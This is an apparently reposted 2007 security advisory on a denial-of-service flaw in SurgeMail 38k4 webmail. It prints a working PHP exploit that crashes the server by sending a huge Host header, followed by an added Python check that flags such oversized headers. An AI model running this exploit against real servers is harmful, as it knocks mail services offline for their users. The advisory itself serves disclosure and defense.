Tuesday, December 18, 2007

[EXPL] SurgeMail Webmail Host Header DoS

The following security advisory was sent to the SecuriTeam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

SurgeMail Webmail Host Header DoS
------------------------------------------------------------------------


SUMMARY

<http://netwinsite.com/surgemail/> SurgeMail Mail Server Software Suite
"combines advanced features, high performance and ease of use. Ideal on
Windows, UNIX ( Linux, Solaris etc.), Mac OSX, FreeBSD and others, this
integrated email server is an Antispam Server, Antivirus Server, Webmail
Server, Groupware Server, Blog Server and much more". A vulnerability in
the way SurgeMail handles the Host field allows remote attackers to cause
the product to crash.

DETAILS

Vulnerable Systems:
* SurgeMail version 38k4

Exploit:
<?php
/*
SurgeMail v.38k4 webmail Host header denial of service exploit
tested against the windows version

rgod
*/

dl("php_curl.so");
$url = "http://192.168.0.1";
$puf=str_repeat(0xff,0xfff);

$header ="POST / HTTP/1.0\r\n";
$header.="Host: $puf\r\n";
$header.="Connection: Close\r\n\r\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL,$url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_TIMEOUT, 0);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $header);

$data = curl_exec($ch);
if (curl_errno($ch)) {
    print curl_error($ch)."\n";
} else {
    curl_close($ch);
}

?>
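
Added example (not part of the original advisory or of rgod's code): a Python check that a reverse proxy or log pipeline could run over raw request heads to flag Host values like the one sent above. The 255-byte limit, the function names and the sample requests are assumptions constructed for illustration; the advisory does not state the length at which SurgeMail fails.

```python
import re

# Assumption: a DNS name fits in 253 bytes; 255 leaves no room for abuse.
MAX_HOST_LEN = 255
# host[:port] where host is a reg-name/IPv4 or a bracketed IPv6 literal.
HOST_RE = re.compile(
    rb"(?:[A-Za-z0-9](?:[A-Za-z0-9.-]*[A-Za-z0-9])?|\[[0-9A-Fa-f:.]+\])"
    rb"(?::[0-9]{1,5})?"
)

def host_values(raw_request: bytes) -> list[bytes]:
    """Collect every Host header value from a raw HTTP request head."""
    head = raw_request.split(b"\r\n\r\n", 1)[0]
    values = []
    for line in head.split(b"\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":
            values.append(value.strip())
    return values

def check_host_header(raw_request: bytes) -> list[str]:
    """Return findings; an empty list means the Host header looks sane."""
    findings = []
    hosts = host_values(raw_request)
    if len(hosts) > 1:
        findings.append("multiple Host headers")
    for h in hosts:
        if len(h) > MAX_HOST_LEN:
            # Length is checked first: the value above is only ASCII digits
            # (PHP casts 0xff to "255"), so a charset check alone passes it.
            findings.append(f"Host value too long ({len(h)} bytes)")
        elif not HOST_RE.fullmatch(h):
            findings.append("Host value is not a valid host[:port]")
    return findings

# Constructed sample requests (not captured traffic).
BENIGN = b"GET / HTTP/1.0\r\nHost: mail.example.com:7080\r\n\r\n"
OVERSIZED = (b"POST / HTTP/1.0\r\nHost: " + b"255" * 0xFFF +
             b"\r\nConnection: Close\r\n\r\n")

if __name__ == "__main__":
    for name, req in (("benign", BENIGN), ("oversized", OVERSIZED)):
        print(name, check_host_header(req))
```
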


ADDITIONAL INFORMATION

The information has been provided by <mailto:retrog@alice.it> retrog.
The original article can be found at:
<http://retrogod.altervista.org/rgod_surgemail_crash.html>
